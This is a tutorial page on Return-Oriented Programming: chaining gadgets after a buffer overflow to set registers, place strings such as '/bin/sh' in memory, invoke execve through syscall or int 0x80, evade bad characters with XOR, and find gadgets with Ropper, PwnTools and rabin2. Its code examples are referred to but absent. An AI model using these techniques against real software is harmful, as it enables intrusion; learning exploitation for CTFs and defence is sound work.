Return-Oriented Programming (ROP)
Return-Oriented Programming is a common technique for exploiting buffer overflows by executing gadgets to do what you want
The idea of ROP is pretty simple. With a buffer overflow, you can control the Instruction Pointer by overflowing the stack where it is stored, and then on a future return (ret
) instruction it will pop that overwritten value from the stack and jump to it.
The trick is that, if we put multiple jump locations on the stack, we can keep ret
urning to different tiny pieces of code. Each time, executing a few instructions we want before the next ret
to keep the chain going. We can use ROP "gadgets" which are helpful pieces of code that help achieve greater things, like getting a shell by executing /bin/sh
.
The concept is explained in more detail in LiveOverflow's Return-Orientred Programming tutorial.
Common idea's
A few common things that you'll encounter while creating your ROP chain.
Getting values into registers
Since you control the stack, the easiest way to get a value into a register is by pop
ing that value from the stack into that register. If you need 1337 in register $rdi
for example, you could simply find a pop rdi; ret
gadget and then append the 1337 value to your payload, which will pop it from the stack. For example:
If you have a simple ROP you can also let PwnTools find this gadget for you:
If there aren't simple pop gadgets for the registers you need, you can also be creative with gadgets like add
, sub
, xor
, etc. manually. An xor ecx, ecx; ret
gadget for example would set ecx
to 0. And using the arithmetic operators you can alter the value from what it was, to the value you want by adding the difference for example.
rax
is the return value
rax
is the return valueOne more useful trick for controlling the rax
register specifically is the fact that it contains the return value of the last function call. The read()
function for example returns the length of the input that was read. Or some calculating function that returns a value. This fact can be useful in choosing which syscall to execute, like execve('/bin/sh').
Getting lucky
The easiest way to get a value into a register is if that value is already in that register at the time of your ROP chain. Always check with a debug breakpoint what the registers are set to when your ROP chain executes, to see if you already have some usable values
Calling functions
When you call a function from code, a few things happen in assembly. First, registers are set to their values as arguments to the function you are calling. Then, the program simply jumps to the address of the function which will take the values from the registers you set. Different architectures have different call conventions:
If these registers are set to the values you want as arguments, you can just jump to the function you wish to call and those will be the arguments. If you for example wanted to call call_me(1337)
on x64, you would need the following assembly:
Since we are using a jmp
here instead of a clean call
, sometimes the stack will get misaligned on 64-bit. When you notice that your exploit should work, but it segfaults during some calls and returns inside of the target function you might want to jump to an empty ret
instruction to align the stack again.
In PwnTools you can easily do this like so right before your call:
Getting strings into registers
Many functions need strings as arguments, like the system()
function or the execve()
syscall, which both need "/bin/sh" as the first argument in order to spawn a shell. Strings are not passed by value, but passed by reference. This means we actually need to provide a pointer the the string as the argument, which needs to be somewhere in memory.
We need to get the string into memory
We need to know its location
There are a few ways to do it, but not a one-size-fits-all solution. It all depends on what is available in the binary.
Already stored in memory
If you're lucky, the string might already be stored in the binary. In libc for example, there exists a "/bin/sh" string that is often used for ret2libc. But you might need other strings that can be found in the binary.
Searching for the offsets for such strings is easy using the grep
command in GDB GEF while running the binary:
If your target system has ASLR enabled, some locations like the libc library will be offset by a random value. So to use these you would first need to leak the library address and then use relative values to use your string again.
But some addresses like the .data
section are not randomized, even when ASLR is enabled. So if your desired string is stored in such a section you can always use it.
From the stack
In a buffer overflow attack, you overflow the stack with your own values to control return addresses, and maybe pop values into registers. But you may also be able to use this space to write your required strings into, and then just provide an address to the stack where your string is stored. This string can then be part of your payload, and so will reference itself.
You can easily get the location of your string on the stack by running the program and inputting your desired string into the payload, and then using the GDB GEF grep
function from above to find where it is stored. This will then give you a location on the stack and you can then reference that location to get a pointer to any string in your payload.
Note that with ASLR, the stack address is randomized. This means that if ASLR is enabled, you will need to first leak a stack address and then use relative offsets from there to find your payload again.
Arbitrary write
Another method is to use an arbitrary write if you have one. Using ROP, or format string exploits you might be able to write data to memory. You can then slowly build out the string you require and then use the address to that location.
Often you can find some static read/write section where data may be written, without corrupting the program. All these sections and their addresses can be found using many tools, such as rabin2 from radare2:
When searching for ROP gadgets to achieve this, you can use mov
instructions that look like:
If you control both registers, you can write any value into any address, as an "arbitrary write". There are many different ways to achieve this and you can be creative with it. Then just write a few addresses after each other to form a full string.
execve('/bin/sh')
execve('/bin/sh')
execve()
is a syscall, an instruction that only the kernel can execute. A program must use such a syscall to elevate its privileges from user mode temporarily and be able to execute these special instructions. There are two ways of doing this:
syscall
syscall
This instruction is exclusive to 64-bit and will use the $rax
register to decide which syscall to execute. A table of all x64 syscalls with their arguments can be found here:
There we can find execve()
as number 59 or 0x3B, and also what its arguments mean:
In assembly, the following values should be set:
Often we don't care about arguments, because we can just run /bin/sh
without any. Then these extra $rsi
and $rdx
registers should be set to 0
.
int 0x80
int 0x80
On 32-bit architechture, the syscall
instruction does not exist. During this time, a kernel call was done by issuing an int
errupt. With interrup 0x80 you can invoke a syscall just like we did on 64-bit. In some cases the compiler will still generate an int 0x80
instruction even on 64-bit architecture so it should always be worth looking for regardless of architecture.
The list of syscalls 32-bit are a bit different and can be found here:
There we can find execve()
as number 11 or 0x0B, and its arguments are the same as for syscall above. In assembly you sould set the values like this (note the different registers):
SROP
Bypassing badchars
"badchars" is the name for characters that the application does not allow. This may be newlines (\x0A
), where it would send your payload before being done. Or null bytes (\x00
) where it would terminate your string before being done. In some specific cases, this is more restricted, and you might need to pull out tricks to not use those banned characters.
If you are trying to inject "/bin/sh"
in your payload for example, but the /
slash is banned, then you can try to do it in more steps.
If you first write ".cho.ri"
, without any /
slash character, you can then later XOR the values with \x01
to get back the original /bin/sh string. This will require any XOR gadget in the binary or any other similar instruction that allows you to alter the bytes of your payload. Some common ones are:
xor
: XOR and store in the first argumentadd
: Add both together and store in the first argumentsub
: Subtract second from first, and store in first
These allow you to change the initial string you send in the payload, and then dynamically change it after it is stored in memory on the target.
Ropper
Ropper is a colorful CLI tool that can automatically find ROP gadgets (meaning small pieces of code before ret
urns) for you that will be useful in creating a full chain. It will print all sorts of gadgets with the idea being that you search for what you need in the output. For example, if we want to find xor
instructions:
To get a more flexible output, you can also just use grep
on the tool's output with what we want:
ropper
may find different gadgets than ROPgadget
, which is a similar tool that also finds gadgets, but may find different specific ones that are more useful:
Ropper can even try to find a full chain for you. One example is the execve('/bin/sh', 0, 0)
syscall, which can be automatically generated if everything required exists (note that it generated Python2 code):
PwnTools
I highly recommend using as much PwnTools magic as you can. It can significantly simplify your payload, and using print(rop.dump())
you can still understand what it is trying to do to debug. Many times things like settings registers or calling functions are tedious, but with ROP
it's a breeze.
rabin2
rabin2
rabin2
from radare2 is a CLI tool that can analyze a binary for you. It has a lot of different options for useful information while planning your ROP exploits.
-i
: Show functions-z
: Show strings in.data
section-s
: Show all symbols-S
: Show sections (with addresses)
Last updated